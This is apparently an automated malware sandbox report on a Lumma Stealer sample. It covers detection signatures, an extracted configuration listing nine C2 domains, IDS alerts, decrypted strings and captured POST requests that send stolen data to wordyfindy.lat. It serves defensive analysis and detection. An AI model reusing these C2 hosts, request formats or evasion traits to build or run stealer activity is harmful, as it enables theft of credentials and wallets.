
Windows Analysis Report
external.exe

Overview

General Information

Sample name: external.exe
Analysis ID: 1579555
MD5: 88cd76e4609e50c6435ebc4771427d2c
SHA1: e86ece49d9d75aebf84e82ba5886014d2a6e302e
SHA256: 42011c4da8ac276fb88efb72aacf717bc57878f5e9a70b9994e4c224c46800bd
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • external.exe (PID: 7004 cmdline: "C:\Users\user\Desktop\external.exe" MD5: 88CD76E4609E50C6435EBC4771427D2C)
    • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • external.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\external.exe" MD5: 88CD76E4609E50C6435EBC4771427D2C)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["wordyfindy.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "bellflamre.click", "shapestickyr.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat"], "Build id": "LPnhqo--alaeljhsfdmg"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000002.00000003.1908135316.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000003.1908103899.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: external.exe PID: 7140 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: external.exe PID: 7140 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: external.exe PID: 7140 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T00:12:00.721501+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:02.708743+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:05.137214+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:18.646834+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:20.849251+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:23.461200+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:26.189139+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:30.898745+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:01.470847+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:03.527568+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:01.470847+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.19.35 | 443 | TCP
2024-12-23T00:12:03.527568+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.19.35 | 443 | TCP
2024-12-23T00:11:58.949369+0100 | 2058212 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56647 | 1.1.1.1 | 53 | UDP
2024-12-23T00:12:24.539100+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 104.21.19.35 | 443 | TCP

AV Detection

Source: 00000000.00000002.1677084752.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["wordyfindy.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "bellflamre.click", "shapestickyr.lat", "bashfulacid.lat", "curverpluch.lat", "tentabatte.lat"], "Build id": "LPnhqo--alaeljhsfdmg"}
Source: external.exe | Virustotal: Detection: 37%
Source: external.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bellflamre.click
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: LPnhqo--alaeljhsfdmg
Source: C:\Users\user\Desktop\external.exe | Code function: 2_2_00414DF0 CryptUnprotectData, | 2_2_00414DF0
Source: external.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.19.35:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: external.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\external.exe | Code function: 0_2_00719126 FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 0_2_00719126
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h] | 2_2_0043D0E0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3E34CFBAh] | 2_2_0042C273
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042C273
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ebx+02h] | 2_2_00425B50
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0042BB35
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0042BB35
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov dword ptr [esp], edx | 2_2_0042BB35
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_0043BC60
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [eax], dx | 2_2_00414DF0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov byte ptr [ecx], al | 2_2_0040CD9C
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov edi, ecx | 2_2_0040CD9C
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], E1A2961Bh | 2_2_0043A6D4
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 2_2_00438750
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then push eax | 2_2_0040B75E
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041C840
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-7Dh] | 2_2_0041C840
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov esi, edx | 2_2_00408860
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [edi], ax | 2_2_00425079
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [edi], cx | 2_2_0041C0E0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_004298E0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then lea eax, dword ptr [eax+eax*4] | 2_2_00408090
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 73004FCFh | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-000000ABh] | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], D6A985C1h | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+esi+2845CDC9h] | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 5E874B5Fh | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 5E874B5Fh | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 888A0AE0h | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], D6A985C1h | 2_2_00419890
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 2_2_00422F90
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 2_2_00422F90
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then jmp eax | 2_2_0042891E
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov ebx, dword ptr [esp] | 2_2_00428134
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_004331D0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_0042A9E8
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ecx, cx | 2_2_0042C9AF
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov edx, ecx | 2_2_0043B9B0
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 2_2_0041EA50
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+4A96EB48h] | 2_2_0043D270
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov edi, eax | 2_2_0043AA2A
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov ecx, eax | 2_2_00422232
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+06h] | 2_2_0042834D
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042834D
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042834D
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ecx, word ptr [esi+eax] | 2_2_00421B60
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+05h] | 2_2_00427B00
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], FAD59DE2h | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 29FCC5D8h | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 3FE33C50h | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then lea esi, dword ptr [esp+00000098h] | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edi+2845CE35h] | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 73B6CFD8h | 2_2_00416B06
Source: C:\Users\user\Desktop\external.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-29138FE1h] | 2_2_0040CB10

Networking

                Source: Network trafficSuricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:56647 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 104.21.19.35:443
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: bellflamre.click
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.19.35:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.19.35:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XQ441IQ67QVVKRAZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7H38HNDLAUCUAG4XREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U0L58UWFFPJHJWO6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NAO7Q2RF23FZTLBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1244Host: wordyfindy.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NHUHIGZRFFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568452Host: wordyfindy.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: bellflamre.click
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wordyfindy.lat
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 
00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: external.exe, 00000002.00000003.1906082479.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905933686.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906598081.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906164389.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906225551.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907131073.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906343810.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905233843.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905589126.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906695904.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1904880647.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1907028346.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905783044.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906516458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905681202.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906769458.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905285277.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1905128011.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 00000002.00000003.1906942409.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, external.exe, 
00000002.00000003.1905162450.0000000000E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
                Source: external.exe, 00000002.00000003.1881585552.00000000034A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: external.exe, 00000002.00000003.1724643128.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, external.exe, 00000002.00000003.1724725983.00000000034D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: external.exe, 00000002.00000003.1882863786.0000000003496000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
